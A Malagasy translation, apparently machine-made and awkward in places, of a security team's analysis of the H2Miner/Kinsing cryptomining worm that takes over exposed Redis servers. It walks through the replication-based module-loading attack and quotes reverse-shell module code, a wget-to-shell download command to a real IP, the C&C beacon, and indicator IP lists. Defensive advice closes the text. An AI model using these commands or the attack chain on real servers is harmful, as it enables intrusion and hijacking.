Indray andro lasa izay, notafihan'ny kankana mitovy amin'izany ny iray amin'ireo mpizara tetikasako. Raha mitady valiny amin'ny fanontaniana hoe "inona izany?" Nahita lahatsoratra mahafinaritra avy amin'ny ekipan'ny Alibaba Cloud Security aho. Satria tsy hitako tao amin'ny Habré ity lahatsoratra ity dia nanapa-kevitra ny handika azy manokana ho anao aho <3
teny
Vao haingana, ny ekipan'ny fiarovana Alibaba Cloud dia nahita fipoahana tampoka ny H2Miner. Ity karazana kankana mampidi-doza ity dia mampiasa ny tsy fisian'ny fanomezan-dàlana na ny tenimiafina malemy ho an'i Redis ho vavahadin'ny rafitrao, aorian'izay dia mampifanaraka ny maodely ratsy azy manokana amin'ny andevo amin'ny alàlan'ny fandrindrana ny andevo tompony ary farany dia misintona ity môdely ratsy ity amin'ny milina voatafika ary manatanteraka ratsy. toromarika.
Taloha, ny fanafihana amin'ny rafitrao dia natao voalohany indrindra tamin'ny fampiasana fomba misy asa voalahatra na fanalahidy SSH izay nosoratana tamin'ny milinanao taorian'ny nidiran'ny mpanafika tao amin'ny Redis. Soa ihany fa tsy azo ampiasaina matetika io fomba io noho ny olana amin'ny fanaraha-maso ny fahazoan-dàlana na noho ny dikan-teny samihafa. Na izany aza, ity fomba fametahana maody ratsy ity dia afaka manatanteraka mivantana ny baikon'ny mpanafika na mahazo miditra amin'ny akorandriaka, izay mampidi-doza ho an'ny rafitrao.
Noho ny habetsahan'ny lohamilina Miaraka amin'ny fisian'ny Redis efa ho 1 tapitrisa voatahiry an-tserasera, ny ekipa fiarovana ao amin'ny Alibaba Cloud, ho fampahatsiahivana, dia manoro hevitra ny mpampiasa mba tsy hamela ny Redis hiditra amin'ny tambajotra ary hizaha toetra tsy tapaka ny tenimiafina mba hahitana ny tanjaka sy ny fahalemen'ny tenimiafiny.
H2Miner
H2Miner dia botnet fitrandrahana ho an'ny rafitra mifototra amin'ny Linux, izay mety hiditra an-tsokosoko amin'ny rafitrao amin'ny alalan'ny fomba isan-karazany, anisan'izany ny fahalemena ateraky ny Hadoop yarn tsy nahazoana alalana, Docker, ary ny Redis remote command execution (RCE). Miasa amin'ny alalan'ny fampidinana script sy malware manimba mba hitrandrahana ny angon-drakitrao, fanitarana ny fanafihana, ary fitazonana ny fifandraisana amin'ny alalan'ny command-and-control (C&C) ny botnet.
Redis RCE
Ny fahalalana momba an'io lohahevitra io dia nozarain'i Pavel Toporkov tao amin'ny ZeroNights 2018. Taorian'ny version 4.0, Redis dia manohana ny endri-pandefasana plug-in izay manome ny mpampiasa ny fahafaha-mitondra ka ny rakitra natambatra miaraka amin'ny C ao amin'ny Redis mba hanatanteraka baiko Redis manokana. Ity fiasa ity, na dia ilaina aza, dia misy vulnerable izay, amin'ny maodely master-slave, ny rakitra dia azo ampifandraisina amin'ny andevo amin'ny alàlan'ny mode fullresync. Ity dia azo ampiasaina amin'ny mpanafika mba hamindrana rakitra ratsy toy izany. Rehefa vita ny fifindrana dia apetaka amin'ny ohatra Redis voatafika ny mpanafika ary manatanteraka baiko rehetra.
Malware Worm Analysis
Vao haingana, ny ekipan'ny fiarovana Alibaba Cloud dia nahita fa nitombo tampoka ny haben'ny vondrona mpitrandraka ratsy fanahy H2Miner. Araka ny fanadihadiana dia toy izao manaraka izao ny dingana ankapobeny amin'ny fisehoan'ny fanafihana:
H2Miner dia mampiasa RCE Redis amin'ny fanafihana feno. Ny mpanafika voalohany dia manafika ireo mpizara Redis tsy voaaro na ireo mpizara miaraka amin'ny tenimiafina malemy.
Avy eo dia mampiasa ny baiko izy ireo config set dbfilename red2.so hanova ny anaran'ny rakitra. Aorian'izany dia manatanteraka ny baiko ireo mpanafika slaveof hametraka ny adiresy mpampiantrano replication master-slave.
Rehefa mametraka fifandraisana master-andevo miaraka amin'ny Redis ratsy izay an'ny mpanafika ilay ohatra Redis voatafika, dia alefan'ilay mpanafika ilay maody voan'ny aretina mampiasa ny baiko fullresync mba hampifanaraka ireo rakitra. Ny rakitra red2.so dia halefa any amin'ny milina voatafika. Ny mpanafika avy eo dia mampiasa ny ./red2.so loading module mba hampidirana ity rakitra ity. Ny maody dia afaka manatanteraka baiko avy amin'ny mpanafika na manomboka fifandraisana mivadika (backdoor) hahazoana fidirana amin'ny milina voatafika.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
Rehefa avy nanatanteraka baiko ratsy toy ny / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ny mpanafika dia hamerina ny anaran'ny rakitra backup ary hamoaka ny maody rafitra hanadiovana ny dian. Na izany aza, ny rakitra red2.so dia mbola hijanona ao amin'ny milina voatafika. Manoro hevitra ny mpampiasa mba handinika ny fisian'ny rakitra mampiahiahy toy izany ao amin'ny lahatahiry misy ny ohatra Redis.
Ho fanampin'ny famonoana ireo dingana ratsy sasany hangalarana loharanon-karena, ny mpanafika dia nanaraka script ratsy tamin'ny alàlan'ny fampidinana sy famonoana ireo rakitra binary maloto . Midika izany fa ny anaran'ny dingana na ny anaran'ny lahatahiry misy kinsing ao amin'ny mpampiantrano dia mety manondro fa io milina io dia voan'ny virus.
Araka ny valin'ny reverse engineering, ny malware dia manao ireto asa manaraka ireto:
- Mampakatra rakitra sy manatanteraka azy ireo
- harena ankibon'ny tany
- Mitazona ny fifandraisana C&C ary manatanteraka baiko mpanafika
Mampiasà masscan ho an'ny fitarafana ivelany mba hanitarana ny herinao. Ankoatra izany, ny adiresy IP an'ny mpizara C&C dia voasokajy mafy ao amin'ny programa, ary ny mpampiantrano voatafika dia hifandray amin'ny mpizara serasera C&C amin'ny fampiasana ny fangatahana HTTP, izay ahitana ny fampahalalana momba ny zombie (server kompromisy) ao amin'ny lohatenin'ny HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Fomba fanafihana hafa
Adiresy sy rohy ampiasain'ny kankana
/kinsing
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Filan-kevitra
Voalohany, tsy tokony hidirana amin'ny Internet ny Redis ary tokony harovana amin'ny tenimiafina matanjaka. Zava-dehibe ihany koa ny manamarina ny mpanjifa fa tsy misy rakitra red2.so ao amin'ny lahatahiry Redis ary tsy misy "kinsing" ao amin'ny anaran'ny rakitra/process amin'ny mpampiantrano.
Source: www.habr.com
